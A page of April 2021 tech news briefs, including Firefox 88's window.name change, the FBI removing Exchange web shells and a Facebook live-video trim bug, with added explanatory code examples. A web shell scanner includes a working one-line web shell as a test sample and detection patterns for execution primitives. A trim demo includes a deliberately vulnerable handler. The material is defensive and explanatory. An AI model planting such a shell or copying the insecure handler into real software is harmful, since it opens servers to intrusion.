More stories


    Firefox 88 clamps down on window.name abuses by trackers

    How window.name persists between sites
    Image: Mozilla
    Firefox 88 was released on Monday, and among the changes is a shift in how the browser handles the window.name property. Previously, this property persisted for the life of a tab, meaning that as a user moved from one site to another the value remained in place, and data written by one site could be read by the next. “Tracking companies have been abusing this property to leak information, and have effectively turned it into a communication channel for transporting data between websites,” Firefox Privacy engineer Tim Huang said in a blog post. “Worse, malicious sites have been able to observe the content of window.name to gather private user data that was inadvertently leaked by another website.”

    Firefox now clears the property when navigating between sites, and if the user goes back to a site, that site’s window.name value is restored. “Together, these dual rules for clearing and restoring window.name data effectively confine that data to the website where it was originally created, similar to how Firefox’s Total Cookie Protection confines cookies to the website where they were created,” Huang said. “This confinement is essential for preventing malicious sites from abusing window.name to gather users’ personal data.”
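To make the two rules concrete, the following is an added example (not Mozilla's code) that models a single tab's handling of window.name and compares the legacy behaviour with the Firefox 88 rules: clear the value on a cross-site navigation, and restore the value a site created when the user navigates back to it. The site computation keeps the last two host labels, an assumption that holds for the sample hosts used here but would need a public-suffix list in real use; the hosts and tracker identifier are constructed.

```javascript
// Reduce a URL to its "site" (scheme + registrable domain), the unit Firefox
// partitions window.name by. Assumption: last two labels are the registrable
// domain (true for shop.example and news.test below, not for e.g. co.uk hosts).
function siteOf(url) {
  const u = new URL(url);
  const labels = u.hostname.split(".");
  return `${u.protocol}//${labels.slice(-2).join(".")}`;
}

class Tab {
  constructor({ partitionWindowName }) {
    this.partition = partitionWindowName; // false = legacy, true = Firefox 88 rules
    this.history = [];                    // session history: [{ url, savedName }]
    this.index = -1;
    this.windowName = "";                 // the live window.name value
  }

  // Top-level navigation (link click, location change) to a new URL.
  // Returns the window.name value the destination page would observe on load.
  navigate(url) {
    if (this.index >= 0) {
      const prev = this.history[this.index];
      prev.savedName = this.windowName;   // remember it for a later back navigation
      if (this.partition && siteOf(prev.url) !== siteOf(url)) {
        this.windowName = "";             // cross-site: destination sees nothing
      }
    }
    this.history = this.history.slice(0, this.index + 1); // drop forward entries
    this.history.push({ url, savedName: "" });
    this.index++;
    return this.windowName;
  }

  // Back navigation. Under the Firefox 88 rules a cross-site back restores the
  // value that the earlier site created; legacy behaviour leaves it untouched.
  goBack() {
    if (this.index <= 0) return this.windowName;
    const from = this.history[this.index];
    from.savedName = this.windowName;
    this.index--;
    const to = this.history[this.index];
    if (this.partition && siteOf(from.url) !== siteOf(to.url)) {
      this.windowName = to.savedName;
    }
    return this.windowName;
  }
}

// Scenario: a tracker on shop.example stores an identifier in window.name,
// the user follows a link to news.test (whose scripts read window.name), then
// returns to shop.example. Returns what each page observed.
function trackerLeak(partitionWindowName) {
  const tab = new Tab({ partitionWindowName });
  tab.navigate("https://shop.example/cart");
  tab.windowName = "trk=7f3a9c";          // constructed tracker identifier
  const seenByThirdParty = tab.navigate("https://news.test/article");
  const afterBack = tab.goBack();
  return { seenByThirdParty, afterBack };
}

console.log("legacy    ", trackerLeak(false)); // identifier leaks to news.test
console.log("firefox 88", trackerLeak(true));  // news.test sees "", shop.example gets it back
```

With the legacy rules the third-party page reads the identifier; with the Firefox 88 rules it reads an empty string, and the value reappears only when the tab returns to the site that wrote it, which is exactly the confinement Huang describes.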

    With the release of Firefox 88, FTP support in the browser is disabled, and the code implementing the protocol is due to be removed in Firefox 90. Clicking an FTP link now causes Firefox to hand it off to an external application. “FTP is an insecure protocol and there are no reasons to prefer it over HTTPS for downloading resources,” Mozilla software engineer Michal Novotny said last year. “Also, a part of the FTP code is very old, unsafe and hard to maintain and we found a lot of security bugs in it in the past.” Other new features in Firefox 88 include support for JavaScript in PDF forms, smooth pinch zoom via a touchpad on Linux, and screen readers no longer reading content that is visually hidden. The screenshot button was also removed from the URL bar, and developers gained a toggle to switch between raw and formatted JSON responses.


    UK cites national security concerns to look into Nvidia purchase of Arm

    The UK Secretary of State for Digital, Culture, Media and Sport Oliver Dowden issued an intervention notice on Monday that will see the nation’s Competition and Markets Authority (CMA) conduct a phase one investigation into the $40 billion purchase of Arm by Nvidia. “We want to support our thriving UK tech industry and welcome foreign investment, but it is appropriate that we properly consider the national security implications of a transaction like this,” Dowden said. The CMA will have until July 30 to prepare its report, after which the Digital Secretary can either clear the deal, gather undertakings in order to clear the deal, or refer it for a phase two investigation based on public interest or competition issues. “In reaching this decision, [Dowden] considered advice received from officials across the investment security community,” a government notice said. Even though the CMA investigation was kicked off on national security grounds, it will also advise whether transferring ownership of the UK chip designer from a Japanese tech giant, in the form of SoftBank, to an American one in Nvidia, would lessen competition. Speaking to journalists last week, Nvidia CEO Jensen Huang said the Arm acquisition was “going really well”. “We’re working with regulators in the US, and Europe, and Asia to explain our vision for Arm — and the vision for Arm is going to expand Arm, it’s going to expand the ecosystem, it’s going to bring more innovation to the market, and so the regulators are very supportive of it because it’s pro-competition, it’s pro-innovation, and it’s pro-choice,” he said.

    Under the terms of the deal announced in September, Nvidia will pay SoftBank $12 billion in cash and $21.5 billion in Nvidia stock, with $5 billion placed under an earn-out clause. Nvidia is not purchasing the IoT services part of Arm. Addressing recent chip supply shortages, Huang said consumers clamouring for products made on a “leading edge process” has put semiconductor manufacturers under pressure. “TSMC and Samsung and Intel are feeling great demand and great pressure,” he said. “I think that we just have to recognise that leading edge process cannot be a fraction of the overall capacity of the industry, it has to be a larger percentage of it, and I think these leading edge semiconductor companies are aware of that and they’re mindful of that. “But it will take a couple of years before we get leading edge capacity to the level that that is supportive of the global demand of digital technology.”


    Mastercard buys digital identity firm Ekata for $850 million

    Mastercard said it will acquire Ekata for $850 million in a deal that will bolster its identity verification technology. Ekata’s application programming interfaces (APIs) and tools are used by merchants, marketplaces and financial firms across multiple industries. Ekata’s platform provides artificial-intelligence-enhanced risk scoring, indicators and data attributes. The purchase will also bolster Mastercard’s digital identity and security framework. Ekata offers a range of identity verification services to prevent fraud, with APIs for transaction risk, account openings, merchant onboarding, risk, phone intelligence and identity checking via email, phone and address. The company also provides a set of tools to speed up manual approvals. Its flagship product is Pro Insight, a software-as-a-service tool that analyzes risk and signals.


    'High-level' organiser of FIN7 hacking group sentenced to ten years in prison

    A “high-level manager” of the FIN7 hacking group has been sentenced to ten years in prison. The US Department of Justice described Ukrainian national Fedir Hladyr, 35, as a systems administrator for the group. He was arrested in Germany in 2018 at the request of U.S. law enforcement and was extradited to Seattle. In September 2019, he pleaded guilty to conspiracy to commit wire fraud and one count of conspiracy to commit computer hacking. Hladyr served as FIN7’s systems administrator and played a central role in aggregating stolen payment card information, supervising FIN7’s hackers, and maintaining the elaborate network of servers that the group used to attack and control victims’ computers, according to the Department of Justice. He also controlled the organization’s encrypted channels of communication, it said. Hladyr was sentenced to ten years in prison by a U.S. District Court in Seattle following an investigation by the Seattle Cyber Task Force of the FBI and the U.S. Attorney’s Office for the Western District of Washington, with assistance from the US Department of Justice and international agencies. “This criminal organization had more than 70 people organized into business units and teams. Some were hackers, others developed the malware installed on computers, and still others crafted the malicious emails that duped victims into infecting their company systems,” said Acting U.S. Attorney Tessa A. Gorman. “This defendant worked at the intersection of all these activities and thus bears heavy responsibility for billions in damage caused to companies and individual consumers.”

    Since at least 2015, FIN7 (also referred to as the Carbanak Group and the Navigator Group) has engaged in a highly sophisticated malware campaign to attack hundreds of U.S. companies, predominantly in the restaurant, gaming, and hospitality industries, the Department of Justice said. FIN7 hacked into thousands of computer systems and stole millions of customer credit and debit card numbers from compromised point-of-sale (PoS) systems, which were then used directly or sold on underground forums for profit. In the United States alone, FIN7 has stolen more than 20 million customer card records from over 6,500 individual point-of-sale terminals at more than 3,600 separate business locations after compromising each target with malware. The operation has been actively hacking businesses in the United States, United Kingdom, Australia, France and other countries since 2015. Companies known to have fallen victim to FIN7 include Chipotle Mexican Grill, Chili’s, Arby’s, Red Robin, and Jason’s Deli.


    Peloton pushes back against ‘urgent’ warning against using Tread+ treadmill

    Peloton has rejected claims made in an “urgent” US safety advisory warning of the risk to children posed by the Tread+.

    The Peloton Tread+, a treadmill that includes Internet and Bluetooth connectivity, a built-in soundbar, and display, is a product offered by Peloton designed to link to real-time exercise classes for users over 16 years of age. On April 17, the US Consumer Product Safety Commission (CPSC) released a video showing two children playing on a Tread+, one of which became temporarily trapped.  The CPSC then published a public health and safety notice to US consumers, urging users with children to “stop using the product immediately.” According to the US agency, the Peloton Tread+ has been linked to 39 incidents involving children and pets, with potential risks including abrasions and fractures. The death of a child has been recorded.  The commission has launched an investigation into the fatality, which was disclosed by Peloton in March. At the time, in a letter to users, Peloton CEO and co-founder John Foley said the company designs and builds products “with safety in mind,” but urged users to “keep children and pets away from Peloton exercise equipment at all times.” Separately, a three-year-old boy suffered head and neck injuries after becoming trapped under a Tread+, leading to what the CPSC calls “significant brain injury.”

    “Peloton was shocked and devastated to learn in March that a child died while using the Tread+,” Peloton said. “Within a day of learning this news, Peloton notified CPSC. While preparing its report to CPSC, Peloton learned through a doctor’s report to CPSC’s public database that a child had experienced a brain injury. Peloton spoke to the family who reported that and the child is expected to fully recover.” “In light of multiple reports of children becoming entrapped, pinned, and pulled under the rear roller of the product, CPSC urges consumers with children at home to stop using the product immediately,” the agency warned.  According to the CPSC, one safety incident may have occurred when a parent was using the treadmill, and it may be that “the hazard cannot be avoided simply by locking the device when not in use.”  The US agency recommends that consumers should keep their Tread+ in a locked room and other objects, such as exercise balls, should be kept well away. In response to the alert, Peloton issued its own statement branding the advisory as “misleading” and “inaccurate.” “There is no reason to stop using the Tread+, as long as all warnings and safety instructions are followed,” the company said. 
    “Children under 16 should never use the Tread+, and members should keep children, pets, and objects away from the Tread+ at all times.” Peloton has also asked users to detach the Safety Key when the treadmill is not in use, as this would prevent the Tread+ from being inadvertently turned on, “precisely to avoid the kind of incident that [the CPSC’s] video depicts.” Furthermore, Peloton says it was willing to make a joint statement with the CPSC concerning the safety concerns, but the agency “unfairly characterized Peloton’s efforts to collaborate and to correct inaccuracies in CPSC’s press release as an attempt to delay.” In a follow-up note, Peloton’s CEO said the company had not obstructed the investigation, other than declining the agency’s demands for personal data of customers who had asked that this information be withheld. “Peloton is disappointed that, despite its offers of collaboration, and despite the fact that the Tread+ complies with all applicable safety standards, CPSC was unwilling to engage in any meaningful discussions with Peloton before issuing its inaccurate and misleading press release,” Peloton added. Foley says the company has “no intention” of recalling or stopping sales of the Tread+.


    The FBI removed hacker backdoors from vulnerable Microsoft Exchange servers. Not everyone likes the idea

    Last week the US Department of Justice revealed how the FBI had worked to remove malicious web shells from hundreds of computers in the United States that were running vulnerable versions of Microsoft Exchange Server. While the move will have helped keep many organisations secure, it has also raised questions about the direction of cybersecurity. Earlier this year, four zero-day vulnerabilities in Microsoft Exchange Server, which were being actively exploited by a nation-state-backed hacking operation, were uncovered. Microsoft released a critical security update to protect Exchange Server customers from cyberattacks exploiting the vulnerabilities in March, but a significant number of organisations have yet to apply the security patch.

    Exchange attacks

    This leaves them vulnerable to attack from a range of actors, including nation-state groups, ransomware gangs, cryptojackers and other cyber-criminal groups that have rushed to exploit the Exchange vulnerabilities. The attackers exploit the vulnerabilities to place web shells – small server-side scripts, typically .aspx pages on Exchange, that take commands from an HTTP request and execute them on the server – which give them continuing unauthorised backdoor access for cyber espionage and other malicious activity. It was these web shells that the FBI launched an operation to remove. Hundreds of unmitigated web shells have been identified and removed from hundreds of systems – to such an extent that the Department of Justice says it has removed one hacking group’s remaining web shells entirely. “This operation is an example of the FBI’s commitment to combating cyber threats through our enduring federal and private sector partnerships,” said Tonya Ugoretz, acting assistant director of the FBI’s cyber division.
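Organisations that want to check their own Exchange servers rather than wait for a notification need a way to find such web shells. The following is an added example, not tooling from the FBI, Microsoft or any vendor named on this page: a heuristic scanner for ASP.NET web shells that runs over constructed in-memory samples so it can be tried offline. The indicators are assumptions drawn from how a web shell is built (a server-side script block that feeds attacker-controlled request input to an execution primitive) and from the Exchange directories where a newly written .aspx page is unexpected; the file paths and contents below are constructed, not captured from a real incident.

```javascript
// Execution primitives a web shell typically relies on (assumed indicator set).
const EXEC_PRIMITIVES = /\b(eval|Execute|ExecuteGlobal|Process\.Start|Assembly\.Load|CreateObject\s*\(\s*["']WScript\.Shell)\b/i;
// Ways of pulling attacker-supplied input out of the HTTP request.
const REQUEST_INPUT = /\bRequest(\[|\.Form|\.Item|\.QueryString|\.Headers|\.Params)/;
// Server-side script block marker in ASP.NET pages.
const SERVER_SCRIPT = /runat\s*=\s*["']server["']/i;
// Exchange directories where a fresh dynamic .aspx should not appear
// (assumption based on public incident write-ups; extend for your layout).
const SENSITIVE_DIRS = [/\\owa\\auth\\/i, /\\ecp\\/i, /\\aspnet_client\\/i];

// Scan one file; returns { path, suspicious, reasons }.
function scanFile({ path, content }) {
  const reasons = [];
  const hasServerScript = SERVER_SCRIPT.test(content);
  const hasExec = EXEC_PRIMITIVES.test(content);
  const hasInput = REQUEST_INPUT.test(content);

  if (hasServerScript && hasExec && hasInput) {
    reasons.push("server-side script passes request input to an execution primitive");
  }
  // One-liner shells are tiny; a legitimate page with an exec primitive rarely is.
  if (hasExec && content.length < 400) {
    reasons.push("execution primitive in a very small page");
  }
  if (/\.aspx$/i.test(path) && SENSITIVE_DIRS.some((re) => re.test(path)) && (hasExec || hasInput)) {
    reasons.push("dynamic .aspx in a directory that should not receive new pages");
  }
  return { path, suspicious: reasons.length > 0, reasons };
}

function scanAll(files) {
  return files.map(scanFile).filter((r) => r.suspicious);
}

// Constructed samples: one benign page, one web shell in the OWA auth
// directory, one legitimate page that reads form input but never executes it.
const SAMPLES = [
  {
    path: "C:\\inetpub\\wwwroot\\app\\Default.aspx",
    content: '<%@ Page Language="C#" %>\n<html><body><h1>Welcome</h1></body></html>',
  },
  {
    path: "C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\errorEE.aspx",
    content: '<script language="JScript" runat="server">function Page_Load(){eval(Request["cmd"],"unsafe");}</script>',
  },
  {
    path: "C:\\inetpub\\wwwroot\\app\\Upload.aspx",
    content: '<%@ Page Language="C#" %><script runat="server">void Page_Load(){ string name = Request.Form["name"]; Response.Write(Server.HtmlEncode(name)); }</script>',
  },
];

for (const hit of scanAll(SAMPLES)) {
  console.log(`SUSPICIOUS ${hit.path}\n  - ${hit.reasons.join("\n  - ")}`);
}
```

Only the OWA sample is reported; the upload page reads request input but never hands it to an execution primitive, so it is not flagged. In a real deployment the input would come from walking the Exchange web root and comparing file modification times against the patch date, and a hit is a reason to start incident response, not merely to delete the file, for the reason the article goes on to make: the shell is a symptom, and the unpatched server and any other implants remain.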

    “Our successful action should serve as a reminder to malicious cyber actors that we will impose risk and consequences for cyber intrusions that threaten the national security and public safety of the American people and our international partners,” she added. Action was taken because of the threat the web shells posed to the organisations. The FBI says it’s attempting to provide notice to all of the organisations from which it has removed web shells, which means that the agency accessed the systems without their knowledge. Even if the intent was good – in short, helping to protect the businesses by removing the access of cyber attackers, and authorised by the courts – this is a significant step by law enforcement. “The effort by the FBI amounts to the FBI gaining access to private servers. Just that should be a full stop that the action is not OK,” says David Brumley, professor of electrical and computer engineering at Carnegie Mellon University and co-founder and CEO of ForAllSecure, a cybersecurity company. “While I understand the good intention – the FBI wants to remove the backdoor – this sets a dangerous precedent where law enforcement is given broad permission to access private servers.” In this case, accessing the networks was deemed appropriate by the courts in order to remove backdoors planted by malicious hackers and to protect the organisations from cyberattacks – but Brumley fears what he described as a “slippery slope”. “We don’t want a future where the FBI determines someone may be vulnerable, and then uses that as a pretext to gain access. Remember: the FBI has both a law enforcement and intelligence mission. It would be the same as a police officer thinking your door isn’t locked, and then using that as a pretext to enter,” he says. 
    But there are also those who believe that the FBI’s actions in entering networks and removing web shells from compromised Microsoft Exchange servers were the right thing to do, especially when organisations are fighting a cyber battle against attackers that are much more highly resourced than they are. “I believe this involvement by the FBI is seen as much appreciated from the private sector when it comes to protecting against nation-state attacks. Right now it is as if the private sector is fighting these nation-state attacks with one hand tied behind our backs, especially when our adversaries are pulling no punches,” says Troy Gill, threat hunter and manager at security company Zix. “We will continue to see more government involved when it comes to mitigating vulnerabilities.” Other security agencies are helping organisations secure their networks against the Microsoft Exchange vulnerabilities – but not by accessing the network without anyone knowing about it first. For example, the UK’s National Cyber Security Centre (NCSC) has helped remove malware related to the Exchange zero-days from over 2,300 Windows machines. This was done in partnership with the affected organisations; the NCSC doesn’t have the powers to enter the networks of private businesses to fix vulnerabilities.

    The NCSC is also actively working with organisations to help them apply the necessary security updates to protect their networks from cyberattacks. And while the FBI has removed the malicious web shells, it hasn’t patched any Microsoft Exchange Server zero-day vulnerabilities or removed any additional hacking or malware tools that could have been placed on networks by attackers. That means that as long as they haven’t applied the patches or examined the network for potentially suspicious activity, businesses that had web shells removed from their networks are still vulnerable to additional attacks – especially if they’re still unaware that the FBI entered the network to remove the web shells in the first place. “The FBI initiative to remove web shell code from compromised Microsoft Exchange servers may be regarded as an important milestone in fighting cybercrime. However, while this operation removes attackers’ access to these vulnerable servers, it doesn’t immediately improve their security,” explains Bogdan Botezatu, director of threat research and reporting at Bitdefender. “The removal of the web shell does not affect the operation of additional malware that might have been planted on the server post-compromise and also does not patch the root issue, so attackers could easily re-exploit the vulnerable server and regain web shell access to it”. A joint advisory from the FBI and CISA (Cybersecurity & Infrastructure Security Agency) has urged organisations to apply the relevant security patches and other procedures to protect their networks from attacks – but until the patches are applied, the servers are still going to remain vulnerable. So while entering networks with the permission of the courts allowed the FBI to remove the immediate threat of web shells, many organisations may still not know if their network was accessed by the FBI in the first place.
    The debate between cybersecurity, rights of access, privacy, and whether it was the right thing to do to protect vulnerable organisations against cyberattacks is going to rumble on. “Some people may be very uneasy about this and feel that a dangerous precedent has been set. Should governments really be permitted to access and manipulate corporate computer systems, even if the reasons for doing so are ostensibly altruistic?” says Brett Callow, threat analyst at Emsisoft. “That said, the action undoubtedly avoided harm as, without it, more organizations would almost certainly have been further compromised. This is really one of those cases where you can understand why something was done and see the benefits of it having been done, but nonetheless wonder whether it should’ve been done,” he adds. Whether it should have been done or not, the incident sets a precedent – and the FBI could take similar action again. “The FBI will continue to use all tools available to us as the lead domestic law enforcement and intelligence agency to hold malicious cyber actors accountable for their actions,” said acting assistant director Ugoretz. Microsoft was approached for comment but a spokesperson said the company had nothing to add.



    Coding error allowed attackers to delete Facebook live video

    Facebook has resolved a coding issue in live video services that allowed attackers to effectively delete content without the consent of owners. 

    On April 17, security researcher Ahmad Talahmeh published an advisory explaining how the vulnerability worked, together with Proof-of-Concept (PoC) code able to trigger an attack. Facebook’s live video allows users to broadcast and publish live streams, a feature that has been widely adopted not only by individuals but also by companies and organizations worldwide, especially during the COVID-19 pandemic and its stay-at-home orders. Owners can publish live streams through a page, group, or event. Once a broadcast has ended, owners can trim the recording to cut out unnecessary content, by choosing from- and to- timestamps. Talahmeh found that this feature allowed a live video to be trimmed on the owner’s behalf to the point of deletion, an unexpected behavior with ramifications for privacy and security. The problem lies in trimming the video to a span of five milliseconds, according to the researcher. “Trimming video to five milliseconds will cause the video to be 0 seconds long and the owner won’t be able to untrim it,” Talahmeh says.

    After obtaining the target live video’s ID and the current user’s ID, a request for the video to be trimmed can be submitted that effectively removes the video. Talahmeh reported his findings to the social media giant on September 25, 2020. The issue was triaged within two hours and a patch was confirmed by Facebook three days later. A bug bounty of $11,000 was issued via BountyCon 2020 and two additional bounties, $1,150 and $2,300, were later awarded by Facebook. The researcher has separately detailed a way to untrim any live video on the platform, a bug bounty report worth $2,875. In addition, Talahmeh found a further security issue in Facebook business pages’ updates informing customers of changes prompted by COVID-19, such as alterations to opening times, deliveries, or access to physical outlets: the “Coronavirus (COVID-19) Update From {page name}” notice could be updated with analyst permissions, which are normally read-only. That report earned Talahmeh $750. ZDNet has reached out to Facebook and will update when we hear back.
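The two weaknesses the report describes, a trim request that is honoured for a caller who does not own the video and a span that collapses to zero, are easiest to see side by side. The following is an added example and not Facebook’s code; the request fields, the in-memory store, the whole-second rounding as the cause of the zero-length result, and the minimum clip length are all assumptions made to illustrate the bug class.

```javascript
// Constructed in-memory video store: id -> { ownerId, durationMs, trim }.
const videos = new Map();
function seed() {
  videos.clear();
  videos.set("vid-1", { ownerId: "user-A", durationMs: 600000, trim: null });
}

const MIN_TRIM_MS = 1000; // assumed shortest clip the service should keep

// Vulnerable handler: no ownership check, and the span is truncated to whole
// seconds, so a request for 0..5 ms yields a 0-second video.
function trimVulnerable(req) {
  const v = videos.get(req.videoId);
  if (!v) return { ok: false, error: "not_found" };
  const startS = Math.floor(req.startMs / 1000);
  const endS = Math.floor(req.endMs / 1000);
  v.trim = { startS, endS };                 // { 0, 0 } for a 5 ms request
  return { ok: true, lengthS: endS - startS };
}

// Hardened handler: the caller must own the video, both bounds must be
// integers inside the recording, and the clip must keep a minimum length.
// Millisecond precision is kept so nothing is silently collapsed to zero.
function trimHardened(req) {
  const v = videos.get(req.videoId);
  if (!v) return { ok: false, error: "not_found" };
  if (v.ownerId !== req.userId) return { ok: false, error: "forbidden" };
  if (!Number.isInteger(req.startMs) || !Number.isInteger(req.endMs)) {
    return { ok: false, error: "bad_request" };
  }
  const tooShort = req.endMs - req.startMs < MIN_TRIM_MS;
  if (req.startMs < 0 || req.endMs > v.durationMs || tooShort) {
    return { ok: false, error: "invalid_range" };
  }
  v.trim = { startMs: req.startMs, endMs: req.endMs };
  return { ok: true, lengthMs: req.endMs - req.startMs };
}

// Attacker user-B targets user-A's video with a 5 ms span.
const attack = { videoId: "vid-1", userId: "user-B", startMs: 0, endMs: 5 };
seed();
console.log("vulnerable:", trimVulnerable(attack)); // { ok: true, lengthS: 0 }
seed();
console.log("hardened:  ", trimHardened(attack));   // { ok: false, error: "forbidden" }
```

The ownership check alone would have stopped the attacker, but the range check matters too: without it the legitimate owner could still trim their own video into an unrecoverable zero-length clip by accident, which is the second half of what the researcher reported.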


    Zero trust, basic cyber hygiene best defence against third-party attacks

    Adopting a zero trust security strategy can better safeguard organisations against third-party attacks, where suppliers should not simply be trusted to do the right thing. In this second piece of a two-part feature, ZDNet looks at how businesses in Asia-Pacific can establish basic cyber hygiene as well as better data management to combat attacks from across their supply chain. There has been a spate of third-party cybersecurity attacks since the start of the year, with several businesses in Singapore and across Asia hit by the rippling effects of such breaches. Just last month, personal details of 30,000 individuals in Singapore might have been illegally accessed following a breach that targeted a third-party vendor of job-matching organisation the Employment and Employability Institute (e2i). Earlier this year, personal data of 580,000 Singapore Airlines (SIA) frequent flyers as well as 129,000 Singtel customers were also compromised through third-party security breaches.

    Acronis CEO Serguei Beloussov believed third-party attacks such as those involving Accellion and SIA could have been prevented with a zero trust architecture. He dismissed suggestions that supply chain attacks could be mitigated through a network of trusted suppliers. Noting that few of them imposed strict access, Beloussov said every supplier had employees and it took just one “untrusted” source to breach a network. Humans made mistakes and this had always been the primary challenge, he said, noting that employees would forget to follow procedures or circumvented these to make their job easier. “Zero trust isn’t just about not trusting [anyone], it’s about personal [cyber] hygiene,” said Beloussov, who likened it to not sharing toothbrushes even with one’s spouse. “Unless you have some proper measures [in place], you’ll be more often sick if you shared toothbrush.”

    Security policies also should be implemented, and adhered to, with regard to how supply chains were protected, he said. Regular checks as well as vulnerability assessment and penetration testing should be carried out, he noted, stressing the need to monitor and control all suppliers. Acronis’ chief information security officer (CISO) Kevin Reed said organisations needed to know who and what were accessing their data. This meant they would have to consistently assess their partners’ trust level, and not just at the start of their business relationship when a new contract was inked, he said. “Three months after [the beginning of the partnership], they might suffer an attack and their trust level would decrease, but if you only evaluated at the start, you would not be able to catch this,” Reed said. “With zero trust, you need to re-evaluate all the time and preferably in real-time. This should apply to anything that touches your data.” Check Point’s research head Lotem Finkelstein added that security should always be a criterion against which products and suppliers were evaluated. Questions should be asked about the security measures they had put in place and whether connections with these suppliers were secured, to limit the risks of engaging with them, Finkelstein said. Reed noted that prevention would play a key role. With the majority of security attacks today opportunistic, he said organisations would be able to thwart most attempts if they adopted preventive measures to decrease their probability of getting breached. “You’re not hacked because someone wants to hack you; you’re hacked because it was easy,” he added. “So if you have some level of hygiene, you raise the bar for attackers and it’s more expensive for them to hack you than another company.”

    Adopt best practices, replace old technology

    Businesses also could mitigate their risk by adopting better data management.
    CyberGRX’s CISO Dave Stapleton pointed to the attack on SITA, whose impact on some airlines might be comparatively small because of the types of data shared. This could indicate good data protection practices such as data segmentation and categorisation, where not every piece of information was stored in one database and access to data was given only to facilitate specific functions. Stapleton also recommended adopting the zero trust approach as well as minimising the data organisations collected. “The data can’t be breached if you don’t have it, so don’t have it if you don’t need it,” he said, adding that there also should be transparency so customers knew exactly who would have access to their data. He also stressed the need for clear expectations about breach notifications, which he said should be included in any contract with organisations that stored or exchanged data. “Security needs to be baked in, rather than bolted on, and we’re not there yet as a society,” he said. “I fear we’re getting outpaced and we don’t have sophisticated defence to counter sophisticated attacks.”


    Above all, there was a need to instil basic cyber hygiene, said Benjamin Ang, senior fellow of cyber homeland defence and deputy head of the Centre of Excellence for National Security (CENS). Established in April 2006, CENS is a research unit of the Nanyang Technological University’s S. Rajaratnam School of International Studies and consists of local and overseas analysts specialising in national and homeland security issues. Ang suggested that there should be fundamental checks businesses were required to implement to be given, for instance, cyber insurance coverage. This would be similar to how fire insurance required owners not to store flammable materials in their property, he said. “There are good practices out there, we just need to implement them,” he noted. “And it really is about people, process, and technology. I’ve seen how even the best process and technology can be easily undone by people. People have to step up.” For one, Stapleton urged software vendors to take more care in managing patches, which should be tested before they were issued. “If you release a patch for your product that doesn’t do what you purport it to do, that’s on you. It’s a disservice to your customers and that’s a problem,” he said. “Bigger enterprises also should test all patches before pushing them to production, which will ensure they don’t break other systems and validate the effectiveness of the patch.” In cases such as Accellion, which involved a 20-year-old product and ineffective patches, he said both the vendor and the bigger enterprise customers should share the blame. He also would not expect large enterprises with deeper resources to use decades-old technology, especially if its manufacturer had made clear it was reaching end-of-life. The onus then was on the organisation to figure out a migration plan, he said.
    Doing so would be much cheaper than the potential cost of paying a ransom should the software vulnerabilities result in a breach, he added. Beloussov put it simply: “Nothing that is old is safe. Something that was built 20 years ago can be penetrated. You have to constantly check and update the system. It’s like being in the military…[where] in a war, if you have the latest [weapon], [the opponent] would have the latest anti-radar system [to detect it], so you have to constantly upgrade your product.” Reed added that the security industry had progressed over time. With modern compilers and frameworks, software these days was more secure, with protection built in by design. However, Ang noted that businesses sometimes chose to retain older software so existing production would not be disrupted. He said he still retained a copy of Windows XP because he needed to access a handful of older applications that could only run on the aged Microsoft operating system. Organisations in older industries, such as the energy sector, typically operated industrial control systems that were more than 20 years old, and upgrading these could mean taking down power systems, he said. So they would end up retaining this old equipment, he added. Teo Yi Ling, senior fellow at CENS, noted that corporate inertia or cost also held organisations back from replacing ageing software. Larger organisations such as Singtel could also have more red tape and, hence, employees might have less flexibility to make changes, Teo said. However, Ang noted, a lot more could be done to enable organisations to detect abnormalities or unusual activities within their network so these could be promptly resolved.
    Alerts should trigger and companies should have a means to isolate or shut down the system to contain the breach, he said. He added that if attackers could not be blocked from breaching the network, there should at least be processes in place to detect and mitigate their impact. “Ultimately, the safety net is being able to detect and mitigate. Legislation is great to require [organisations] to have more checks done across their supply chain, but laws have limits,” he said. Ang explained that software and IT environments were complex, with some individuals using some 20 different applications that they could not access on the corporate network, but had running on their work laptops. In such cases, enterprises must have the ability to assess these applications and ascertain who should have the authority to do so, he said. Teo further expressed frustration that, despite frequent warnings and an increase in public awareness, there still were people who would not change the default password on their connected devices. “Every time there’s a breach, we’re told we need to be vigilant, but why are we not getting better at this?” she said. “We need to stop thinking [about security] in a linear way as supply chains are [complex]. All the different players, stakeholders, and companies contribute to each node that’s connected to the supply chain and entire ecosystem. Organisations need to understand how to defend it on a granular level, determine what security-by-design looks like, and build it in.” Stapleton also expressed concern that security breaches had become so commonplace that individuals were becoming desensitised and no longer cared about the need to safeguard their data. It was also worrying that business leaders were not prioritising security at the same rate as their adversaries, he noted. He added that CISOs needed to claim seats at the same table where executive decisions, including budgeting and strategic moves, were made.